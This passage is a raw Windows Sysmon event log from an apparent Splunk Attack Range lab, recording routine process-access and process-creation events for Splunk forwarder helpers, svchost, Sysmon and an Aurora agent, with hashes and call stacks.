12:29:32.378{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.378{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E62C-63C7-8406-00000000AF02}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.378{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E62C-63C7-8406-00000000AF02}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000046325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.379{FE4C2B44-E62C-63C7-8406-00000000AF02}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018584Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.585{E5A8D418-E62C-63C7-3902-00000000B002}19843212C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018583Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E62C-63C7-3902-00000000B002}1984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018582Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018581Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018580Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018579Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018578Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018577Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018576Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018575Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018574Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018573Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E62C-63C7-3902-00000000B002}1984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018572Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.357{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E62C-63C7-3902-00000000B002}1984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018571Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:32.358{E5A8D418-E62C-63C7-3902-00000000B002}1984C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000046324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:32.157{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 23542300x800000000000000018600Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:33.918{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26986BFB3BCE1FEE3D6171057BA278E2,SHA256=0B329696A2253728B2C5C3A640958974C6DD75DD672321D580F952BA19AD13DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.780{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E62D-63C7-8606-00000000AF02}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.780{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.780{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.780{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.780{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.780{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E62D-63C7-8606-00000000AF02}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000046349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.780{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E62D-63C7-8606-00000000AF02}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000046348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:33.780{FE4C2B44-E62D-63C7-8606-00000000AF02}3416C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program 